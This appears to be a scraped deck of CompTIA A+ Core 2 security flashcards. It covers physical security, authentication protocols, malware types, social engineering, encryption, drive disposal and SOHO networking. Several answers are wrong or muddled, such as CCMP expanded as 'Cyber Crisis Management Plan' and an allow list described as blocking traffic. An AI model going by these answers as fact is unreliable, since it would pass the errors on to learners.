A+ Core II 2.0 Security Flashcards

1
Q

What is the list of different PHYSICAL forms of security used in protecting a data center?

A

*Access control vestibule
*Badge reader
*Video surveillance
*Alarm systems
*Door locks
*Equipment locks
*Guards and access lists
*Barricades / Bollards
*Fences

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is an access control list?

A

A set of rules used to assign permissions or grant different levels of access to files and business-critical information.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is NAT?

A

Network Address Translation: A way to map multiple private addresses inside a local network to a public IP address before transferring the information onto the internet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is QoS?

A

Quality of Service: The use of mechanisms or technologies that work on a network to control traffic and ensure the performance of important apps with limited network capacity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is ICMP?

A

Internet Control Message Protocol: A protocol that devices within a network use to communicate problems with data transmission.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is an Active Directory?

A

A database of everything on the network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is an OU in an Active Directory?

A

Organizational Unit; is a subdivision within an Active Directory in which you can place users, groups, computers, and other organizational units (used in very large databases).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What are logon scripts?

A

Scripts that allow admins to configure the operating environment for webspace users. May perform an arbitrary set of tasks such as defining user-specific environment variables.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is a central console that allows users to manage other users or computers?

A

Group Policy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What is the purpose of a home folder?

A

A centralized shared folder meant for users to store their files in instead of the local storage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What encryption methods does WPA2 use?

A

CCMP- Cyber Crisis Management Plan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What encryption methods does WPA3 use?

A

GCMP - Galois/Counter Mode Protocol

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is the PSK authentication process?

A

Using a pre-shared key shared between two parties to log onto a network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is the main issue with WPA2s PSK authentication method?

A

Attackers can listen in the four-way handshake and brute force the PSK using the hash

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

In what way is the PSK brute-force problem remedied with WPA3?

A

It uses SAE (Simultaneous Authentication of Equals) to include mutual authentication, meaning there is no longer a need for a four-way handshake to be sent over the network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What kind of encryption method allows two devices to derive a shared key without actually sending the keys across the network?

A

Diffie-Hellman key exchange

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

What is the RADIUS authentication mode?

A

One of the more common AAA methods thats supported on a wide variety of platforms and devices.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

What remote authentication protocol is commonly used with Cisco devices?

A

TACACS/TACACS+

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What network authentication protocol is commonly used in Windows OSes?

A

Kerberos

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What authentication method should you use if; You have a RADIUS server and a VPN concentrator that can talk to a RADIUS server?

A

RADIUS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

What authentication method should you use if you have a Cisco device?

A

TACACS/TACACS+

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

What authentication method should you use if you’re using a Microsoft Windows device?

A

Kerberos

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

List malware types and methods:

A

*Trojan Horse
*Rootkit
*Viruses
*Spyware
*Ransomware
*Keylogger
*Boot sector virus
*Cryptominers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Describe a Trojan horse

A

Software that pretends to be something helpful/harmless. Better trojan horses are built to circumvent your existing security.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Describe a rootkit

A

Originally a Unix technique, this is a form of malware that can modify the system core files and embed itself in the kernel

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

What are some ways to find and remove rootkits?

A

*Use anti-malware scans to find any unusual activity
*Use a remover specific to the rootkit
*Secure boot with UEFI

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Describe a virus

A

Malware that can replicate itself through file systems or networks. May or may not cause problems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

Describe a boot sector virus.

A

A virus born from a boot loader being modified to run malware. This form of virus runs before the OS is even loaded

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

Describe spyware

A

Malware that spies on you via browser monitoring or keyloggers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

Describe ransomware

A

A form of malware that encrypts your data. To get the encryption key for your data, you need to pay a ransom to the attackers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

Describe how cryptominers work

A

Cryptocurrency mining requires “proof of work”, which usually consists of a difficult math problem. Attackers install malware into other people’s devices and use their CPU to process these calculations for their cryptocurrency.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

What is a command line in Windows that can be used as a last resort to remove any malware from a system?

A

Windows Recovery Environment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

How can you start the Windows recovery environment?

A

*All Windows versions: Hold the Shift key while clicking restart, or boot from installation media

*Windows 10: Settings>Update and Security>Recovery>Advanced Startup

*Windows 11: System>Recovery>Advanced Startup>Restart now

*After rebooting: Troubleshoot>Advanced options>Command Promts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

What are some ways/techniques that can be used to prevent/rid of malware or viruses on a system?

A

*Windows Recovery Environment (Last resort)

*Anti-virus/ Anti-malware

*Software firewalls

*Anti-phishing training

*End-user education

*OS reinstallation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

Contrive a list of different social engineering tactics

A

*Phishing/Vishing/Smishing
*Spear Phishing
*Tailgating/Piggybacking
*Impersonation
*Dumpster diving
*Wireless evil twin
*Shoulder Surfing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

What is the definition of Denial of Service?

A

To force a service to fail by overloading, or exploiting a design flaw

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

What is a zero-day attack?

A

An attack that uses a vulnerability that hasn’t been yet discovered or remedied.

38
Q

What is an on-path attack?

A

When a user sits in a conversation and can view and even alter the data being sent between two devices

39
Q

What is an on-path attack that takes place on a local IP subnet called?

A

ARP poisoning

40
Q

What does ARP stand for in ARP poisoning?

A

ARP=Address Resolution Protocol: A protocol that connects an ever-changing IP address to a fixed physical machine address (or MAC address)

41
Q

What does it mean to store passwords “in the clear”?

A

To store account passwords with no encryption, meaning anyone with access to the server can see them. (Not a recommended way to store passwords)

42
Q

What is an insider threat in terms of Cyber Security?

A

Cyber attack threats within an organization

43
Q

What is code injection?

A

Adding your information into a datastream. Usually enabled because of bad programming

44
Q

What is Cross-site scripting (XSS)?

A

An attack that takes advantage of vulnerabilities within the JavaScript program

45
Q

Break down a non-persistent (reflected) XSS

A

*Run some type of script in a user’s browser (Search box is a common source)

*Attacker emails a link that takes advantage of this vulnerability

*Runs a script that sends credentials/session IDs/Cookies to the attacker

*Script embedded in URL executed in the victim’s browser as if it came from the web server

*Attacker uses credentials/session IDs/Cookies to steal victims info without their knowledge

46
Q

What does a firewall exception do?

A

Allows an app or feature through the Windows Firewall

47
Q

Where can you go to temporarily disable your firewall?

A

Control Panel>Windows Defender Firewall(Requires elevation)

48
Q

What are a few ways to log on to a Windows System?

A

*Local Accounts

*Microsoft accounts (Sync between devices, integrate apps like Skype or Office with OneDrive)

*Windows Domain Accounts

49
Q

What is the order of the User Hierarchy in Windows systems?

A

*Administrators

*Standard Users

*Guest (Limited Access)

50
Q

What is the function of BitLocker?

A

You can select it to encrypt all of your data in a drive, even the Operating System.

51
Q

What is EFS?

A

Encrypting File System: A service integrated into NTFS that allows you to encrypt files at the file system level. This can be used if you don’t wanna encrypt an entire Windows system, but you wanna encrypt specific files.

52
Q

What is the best practice for protecting data on a USB drive?

A

Make sure all data on USB drives are encrypted, as losing them can pose a risk of your data being leaked.

53
Q

What are some good practices in protecting your encrypted data?

A

*Have a decryption key
*Keep the decryption key backed up/ a copy
*You can integrate the key into Active Directory

54
Q

True or false: An attacker can use the default username and password found in a system to gain access to a server or machine.

A

True

55
Q

What are some ways to secure your information when working in public spaces?

A

*Use a privacy filter on your screen to keep onlookers from peeking at your screen

*Keep your monitor away from windows and hallways

56
Q

True or False: Encrypting the data on a USB device is just as important as encrypting any data on a drive?

A

True

57
Q

What are some ways to protect/retain the decryption key?

A

*Have a copy backed up somewhere

*You can integrate it into Active Directory

58
Q

What are some good practices for maintaining strong passwords in an organization?

A

*Have a mandatory password change every 30, 60, or 90 days

*Have critical systems change their passwords even more frequently

*The recovery process should not be trivial

*Change default usernames/passwords

59
Q

What is the best practice for AutoRun and AutoPlay?

A

Generally wanna have these features turned off, that way when removable media is installed its contents aren’t automatically displayed on the screen

60
Q

Why don’t mobile phones include a firewall? And what are some ways to remedy this vulnerability?

A

Mobile phones dont have a firewall because most activity initiates outbound instead of inbound. To remedy this, there are firewall apps available (mostly on android).

61
Q

What is a way an enterprise can centrally manage an employee’s personal phones?

A

Admins can use what is called an MDM, or mobile device manager to set policies on apps, camera, etc.

62
Q

List some examples of IoT devices

A

*Sensors
Heating, cooling, Lighting

*Smart devices
Home automation, video doorbells

*Wearable tech
Watches, health monitors

*Facility Automation
Temperature, air quality, lighting

63
Q

What are some things to consider when there is an IoT device involved in your network?

A

IoT manufacturers are not security professionals, so they may not consider the security risks when making these devices. To remedy this issue, you can add all of your IoT devices to a guest network to isolate them from other devices within the same network.

64
Q

What are some ways you can safely and effectively destroy a device that contains sensitive data?

A

*Shredder

*Drill/Hammer through all platters on a storage device or drill through any chips in an SSD

*Electromagnetic (degaussing)
Removes the magnetic field, which
destroys the drive data and
electronics

64
Q

What is low-level formatting in disk formatting?

A

This is the default formatting provided at the factory. This is not a recommended format for the user.

64
Q

What is a certificate of destruction?

A

A certificate that a third-party company hands you after destroying a device. This is to show validation that the device was successfully destroyed without the risk of any data being leaked.

65
Q

What is standard formatting [Quick formatting] in disk formatting?

A

This is the format a disk takes on when a user sets up the file system and installs a boot sector. This clears out the master file table but keeps the data within it intact.

66
Q

What is standard formatting [Regular format] in disk formatting?

A

In this format, the system overwrites every sector with zeros. This is the default format for Windows Vista systems and later. In this format, the data cannot be recovered.

67
Q

Whats a SOHO?

A

A small office or home office

68
Q

What is an allow list?

A

A list of different IP addresses that cannot pass through the firewall unless it’s approved

69
Q

What is a deny list?

A

A list of specific URLs, domains, or IP addresses that are not allowed to be accessed going outbound

70
Q

What is content filtering?

A

A feature that allows you (parent, admin, or regular user) to regulate allowing or disallowing access to certain locations.

71
Q

True or False: Content filtering is often done within a single device, such as a router, switch, access point, firewall, etc.

A

True

72
Q

In a SOHO environment, how are IP addresses distributed often?

A

They’re manually distributed

73
Q

What are DHCP reservations?

A

This is a feature with DHCP servers that lets you assign a specific IP address to a specific MAC address

74
Q

What is UPnP (Universal Plug and Play)?

A

A protocol that lets UPnP-enabled devices on your network automatically discover and communicate with each other

75
Q

What are the best practices as far as UPnP goes?

A

The best practice is to have UPnP disabled unless an app requires it. This feature is used mainly for peer-to-peer apps, and there is no approval needed.

76
Q

What is a screened subnet (AKA DMZ- Demilitarized zone)?

A

This is essentially a network that is put outside a firewall to mitigate attackers from gaining access to the rest of the network

77
Q

What is SSID (Service Set Identifier)

A

This is the name of a wireless network. Some examples include: LINKSYS, DEFAULT, NETGEAR

78
Q

What is an open system in networking terms?

A

A network that requires no authentication (i.e. Coffe shop or Hotel)

79
Q

What encryption methods are typically used in a SOHO environment?

A

WPA/2/3-Personal or WPA/2/3-PSK

80
Q

What encryption methods are typically used in an enterprise setting?

A

WPA/2/3-Enterprise or WPA/2/3-802.1X

81
Q

What is LDAP?

A

A protocol that helps users find data about organizations, persons, and more (lightweight version of DAP [Directory Access Protocol])

82
Q

What is a guest network? And what are some good practices when it comes to guest networks?

A

A guest network is a feature that allows you to create a separate network from your main one. Though it may be best to disable this feature, using a guest network either for IoT devices or Lab network can be helpful, as this will keep these devices isolated from the main network

83
Q

What is port forwarding?

A

This function takes traffic that is inbound to your router, determines which port is being used, and redirects the network traffic onto the device that is being communicated with

84
Q

True or false: Having you download malicious browser extensions is yet another way attackers can install malware on your device

A

True

85
Q

What can you use to verify a browser’s or app’s hash?

A

You can use a hash-checking app

86
Q

What’s a tool you can use to have all of your credentials from different websites and sources on one centralized website?

A

Password managers

87
Q

What is one way to check the legitimacy of a website?

A

Check the certificate to see if the dates are aligned, the certificate is properly signed, and the domain name matches the certificate

88
Q

How can you find a website’s certificate details in Chrome?

A

Click the menu button on the top right-hand corner of the screen. then go to; More tools>Developer tools, then click on the Security tab

89
Q
A